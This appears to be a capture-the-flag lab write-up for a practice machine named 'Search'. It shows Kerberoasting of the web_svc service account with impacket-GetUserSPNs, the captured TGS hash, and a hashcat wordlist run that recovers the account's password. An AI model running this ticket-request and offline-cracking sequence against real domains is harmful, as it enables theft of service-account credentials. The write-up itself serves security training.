InfoSec LAB

Search_Kerberoating

Created: 2 min read

Kerberoating

during the bloodhound enumeration, the web_svc account has been identified to be vulnerable to kerberoasting

kerberoasting is an attack where an adversary targets service tickets granted by the Key Distribution Center (KDC) in a Kerberos authentication system. The attacker requests service tickets for specific service accounts and attempts to crack the encrypted Ticket Granting Service (TGS) tickets offline, seeking to obtain plaintext credentials. This attack takes advantage of weak encryption used to protect service tickets, enabling the adversary to potentially compromise user accounts.

┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=hope.sharp@research.search.htb.ccache impacket-GetUserSPNs SEARCH.HTB/hope.sharp@research.search.htb -no-pass -k -dc-ip $IP -dc-host research.search.htb -request-user web_svc
Impacket v0.12.0.dev1+20231130.165011.d370e63 - Copyright 2023 Fortra
 
ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation 
---------------------------------  -------  --------  --------------------------  ---------  ----------
research/web_svc.search.htb:60001  web_svc            2020-04-09 14:59:11.329031  <never>               
 
 
 
$krb5tgs$23$*web_svc$SEARCH.HTB$SEARCH.HTB/web_svc*$e71d74f33d3c52ca92e68177c73630f3$9f84086f58b0a9559024c291db262e2f212830d84de9ef63751e3bb94dfd062543dd5dc000a83ddfa1109bf390ca92727d98b2d98d21e6177990ab13324adca884e0b5d3ad3845d68df187b2b4889a0020d123c7023f9fda248dfe42234e24d711d1e071dcdf325cb5b010d2c26ac6965efeb740a1d46df20373bb551a2211ca04baf9ddbb580514e5474d12554a34aaa6dbab3e51b14d19002e9f7e7074c64295089a597125bf301a522cdd3f2fc685b8833d5b34db913dfcca1b98cab196e83d0186f5543312acf9bb7510bbfa5f4ba333271f4222dc01aaca6dd952f12cc06dc2e69aa2c30ca92b3088d8148c26f3148bdd02a79912cc640fbea5acb831d2591d459115e22b97c05d29fce03aa32da9d2917aa0c892c58e47309485e91eda7b5c2d8e1984585a9fc679fc3e70aa98e5765d465e823a5bd277a89cbb2affa83503bc7971ab4e30f6f5822da6e8a7e622fc86f89253434e3fbe6076b4f09f393ae49e84af5b54d2a694d5daa635de0eb113e1f06c3cc7506da1d286e67a54137f8bcb158ea86d196230166b2c5261bea32f7cd8f8208bb81eac896c5fe46be1a1354330d0a4a591f0b1d0bb94d664f0e1ab063a6583aa71db10255dbb336d0c92c5002ba7feab2b5f45dcf074efc7bf91e6480fec748badc593de610e33023c2ad6f8dbb02966fab67860d55e1d039e8f7f18ca238c7fad83f096e9746de039c3daed53b4e44b8dc0bc7bad1214a68bb9450bfb23ce2ea6f4762fe554c4a3de254314a55ed7075bc2e8c40a9b12fa06b2523a3d30f6677cdd549d52bb7fea9e86713664113830f9d27bfe5fee6c46f1aef1052996617865948cc1fdd2d2c337b6cec5e7cdad14db3e66d3ab5b456db5cce076e8cfd987b5649f289d0576384863f4827bacb88676ac2065b5abcc68c604ecc422764e27d17f8f100d750215442c36377af394e3ba7f174e3620f9fdb915d94711bd8b45d5ab5032bfe148bafd20acb98d56c60645846f3cf184d1db39748cb6ca9507097fbd59ed3da84f342bc0dde7e6906d640646b57fe11dda6c693e16cdce20f74882620e3dc3837780ac0f8c679a17f1cf4fb1a801f2c62e1b36dbced82d5a0c9ddff90263aa9d0c9571e1764f4b1681416b75b047c0d0ffa4e3c21871bffd60d8637576d85da59d8de402a69459e5054affc367121d1d87ece159ee2c28c010d79362c92e18fe88851f2dd8e44ac8b58e6d1a6e28bbb7d57c04ed7cf775d2574c0d5d8b7c4f8fe30253585b25ecb1db87da2838981f99c335376185712334c8283533298d2f5e466d7ecf5302a06a8ce2d5eb7411a5e9ada3bd62b6921a1a1c7f933f62a1b8c2007964a8b7609f65ee763acd51a3264fe2f06898f6f9c0bfd33f460b82cf0b60ddca09d96924fd815cd98a52b7491382bfa90521a6ded66fa8ba1a1f6aa8d58f26b9de55244826c9909577b91ba90640c4ff67eb4e217d33

Using the TGT of the hope.sharp user, I am able to authenticate to the target KDC to Kerberoast the web_svc account, effectively extracting the TGS hash the spn is research/web_svc.search.htb:60001

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ hashcat --show web_svc.hash
 
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
 
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ hashcat -a 0 -m 13100 web_svc.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
$krb5tgs$23$*web_svc$SEARCH.HTB$SEARCH.HTB/web_svc*$e71d74f33d3c52ca92e68177c73630f3$9f84086f58b0a9559024c291db262e2f212830d84de9ef63751e3bb94dfd062543dd5dc000a83ddfa1109bf390ca92727d98b2d98d21e6177990ab13324adca884e0b5d3ad3845d68df187b2b4889a0020d123c7023f9fda248dfe42234e24d711d1e071dcdf325cb5b010d2c26ac6965efeb740a1d46df20373bb551a2211ca04baf9ddbb580514e5474d12554a34aaa6dbab3e51b14d19002e9f7e7074c64295089a597125bf301a522cdd3f2fc685b8833d5b34db913dfcca1b98cab196e83d0186f5543312acf9bb7510bbfa5f4ba333271f4222dc01aaca6dd952f12cc06dc2e69aa2c30ca92b3088d8148c26f3148bdd02a79912cc640fbea5acb831d2591d459115e22b97c05d29fce03aa32da9d2917aa0c892c58e47309485e91eda7b5c2d8e1984585a9fc679fc3e70aa98e5765d465e823a5bd277a89cbb2affa83503bc7971ab4e30f6f5822da6e8a7e622fc86f89253434e3fbe6076b4f09f393ae49e84af5b54d2a694d5daa635de0eb113e1f06c3cc7506da1d286e67a54137f8bcb158ea86d196230166b2c5261bea32f7cd8f8208bb81eac896c5fe46be1a1354330d0a4a591f0b1d0bb94d664f0e1ab063a6583aa71db10255dbb336d0c92c5002ba7feab2b5f45dcf074efc7bf91e6480fec748badc593de610e33023c2ad6f8dbb02966fab67860d55e1d039e8f7f18ca238c7fad83f096e9746de039c3daed53b4e44b8dc0bc7bad1214a68bb9450bfb23ce2ea6f4762fe554c4a3de254314a55ed7075bc2e8c40a9b12fa06b2523a3d30f6677cdd549d52bb7fea9e86713664113830f9d27bfe5fee6c46f1aef1052996617865948cc1fdd2d2c337b6cec5e7cdad14db3e66d3ab5b456db5cce076e8cfd987b5649f289d0576384863f4827bacb88676ac2065b5abcc68c604ecc422764e27d17f8f100d750215442c36377af394e3ba7f174e3620f9fdb915d94711bd8b45d5ab5032bfe148bafd20acb98d56c60645846f3cf184d1db39748cb6ca9507097fbd59ed3da84f342bc0dde7e6906d640646b57fe11dda6c693e16cdce20f74882620e3dc3837780ac0f8c679a17f1cf4fb1a801f2c62e1b36dbced82d5a0c9ddff90263aa9d0c9571e1764f4b1681416b75b047c0d0ffa4e3c21871bffd60d8637576d85da59d8de402a69459e5054affc367121d1d87ece159ee2c28c010d79362c92e18fe88851f2dd8e44ac8b58e6d1a6e28bbb7d57c04ed7cf775d2574c0d5d8b7c4f8fe30253585b25ecb1db87da2838981f99c335376185712334c8283533298d2f5e466d7ecf5302a06a8ce2d5eb7411a5e9ada3bd62b6921a1a1c7f933f62a1b8c2007964a8b7609f65ee763acd51a3264fe2f06898f6f9c0bfd33f460b82cf0b60ddca09d96924fd815cd98a52b7491382bfa90521a6ded66fa8ba1a1f6aa8d58f26b9de55244826c9909577b91ba90640c4ff67eb4e217d33:@3ONEmillionbaby
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*web_svc$SEARCH.HTB$SEARCH.HTB/web_svc*...217d33
Time.Started.....: Tue Jan 30 16:47:20 2024 (5 secs)
Time.Estimated...: Tue Jan 30 16:47:25 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2687.4 kH/s (1.68ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11493376/14344386 (80.12%)
Rejected.........: 0/11493376 (0.00%)
Restore.Point....: 11485184/14344386 (80.07%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: @m0rcit0 -> <div><embed src="http://apps.rockyou.com/fxtext.swf?ID=34063538&nopanel=true&stage=true" quality="high"  scale="noscale" width="526.17" height="120.8375" wmode="transparent" name="rockyou" type="application/x-shockwave-flash" pluginspage="http://www.macro
Hardware.Mon.#1..: Util: 66%
 
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Tue Jan 30 16:47:19 2024
Stopped: Tue Jan 30 16:47:26 2024

hashcat cracked the TGS ticket The cracked password is @3ONEmillionbaby Validation will be made by requesting for a TGT

Interactive Graph View

Backlinks